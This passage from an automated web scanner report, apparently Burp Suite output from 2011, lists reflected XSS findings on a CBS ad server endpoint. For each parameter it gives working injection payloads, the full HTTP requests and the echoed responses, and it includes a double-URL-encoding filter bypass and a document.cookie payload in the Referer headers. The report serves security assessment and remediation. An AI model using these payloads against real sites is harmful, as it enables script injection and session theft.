/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US45b84<a>3f59d2a0e54&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PA
...[SNIP]...

1.134. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into a JavaScript inline comment. The payload 60d21*/alert(1)//3098f5412a was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b60d21*/alert(1)//3098f5412a&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:05 GMT
Server: Apache/2.2
Content-Length: 1187
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b60d21*/alert(1)//3098f5412a&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.135. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the DVAR_SESSION request parameter is copied into the HTML document as plain text between tags. The payload 1aacb<a>a9e8aafda38 was submitted in the DVAR_SESSION parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b1aacb<a>a9e8aafda38&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:06 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:06 GMT
Content-Length: 601

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b1aacb<a>a9e8aafda38&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRA
...[SNIP]...

1.136. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 963a9*/alert(1)//e7e2702a46 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS963a9*/alert(1)//e7e2702a46&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:33:33 GMT
Server: Apache/2.2
Content-Length: 1145
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:33:33 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS963a9*/alert(1)//e7e2702a46&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NU
...[SNIP]...

1.137. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into the HTML document as plain text between tags. The payload 8321f<a>c1fffffa83 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS8321f<a>c1fffffa83&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:33:35 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:33:35 GMT
Content-Length: 600

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS8321f<a>c1fffffa83&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_N
...[SNIP]...

1.138. http://mads.cbs.com/mac-ad [NCAT parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 2dc21<a>6048630f020 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A2dc21<a>6048630f020&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:59 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:59 GMT
Content-Length: 619

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A2dc21<a>6048630f020&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='
...[SNIP]...

1.139. http://mads.cbs.com/mac-ad [NCAT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into a JavaScript inline comment. The payload cce01*/alert(1)//1575e9d6777 was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3Acce01*/alert(1)//1575e9d6777&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:31 GMT
Server: Apache/2.2
Content-Length: 1194
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:31 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3Acce01*/alert(1)//1575e9d6777&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.140. http://mads.cbs.com/mac-ad [NODE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into a JavaScript inline comment. The payload 901dd*/alert(1)//13d918e3a50 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806901dd*/alert(1)//13d918e3a50&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:45 GMT
Server: Apache/2.2
Content-Length: 1172
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:45 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806901dd*/alert(1)//13d918e3a50&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.141. http://mads.cbs.com/mac-ad [NODE parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload e0b42<a>621aa8019b1 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806e0b42<a>621aa8019b1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:23 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:37:23 GMT
Content-Length: 602

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806e0b42<a>621aa8019b1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='
...[SNIP]...

1.142. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload b9251*/alert(1)//b4f70b6b83f was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b9251*/alert(1)//b4f70b6b83f&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:05 GMT
Server: Apache/2.2
Content-Length: 1179
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b9251*/alert(1)//b4f70b6b83f&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.w
...[SNIP]...

1.143. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92086%2527%253balert%25281%2529%252f%252f2cd17c06c35 was submitted in the PAGESTATE parameter. This input was echoed as 92086';alert(1)//2cd17c06c35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the PAGESTATE request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=92086%2527%253balert%25281%2529%252f%252f2cd17c06c35&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:03 GMT
Server: Apache/2.2
Content-Length: 1225
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:03 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=92086%2527%253balert%25281%2529%252f%252f2cd17c06c35&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT
...[SNIP]...
sion%253db&amp;ucat_rsi=%2526&amp;pg=&amp;t=2011.02.06.20.34.03/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='92086';alert(1)//2cd17c06c35';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw1.cnet.com::2603727760 2011.02.06.20.34.03 *//* MAC T 0.0.3.3 */

1.144. http://mads.cbs.com/mac-ad [POS parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload da453<a>3c66de957c3 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100da453<a>3c66de957c3&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:42 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:42 GMT
Content-Length: 616

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100da453<a>3c66de957c3&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='80' CNET-PTYPE='6711' POS='100da453a3c66de957c3' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_P
...[SNIP]...

1.145. http://mads.cbs.com/mac-ad [PTYPE parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload dba23*/alert(1)//ccaf888c20c was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711dba23*/alert(1)//ccaf888c20c&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:47 GMT
Server: Apache/2.2
Content-Length: 1173
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:47 GMT

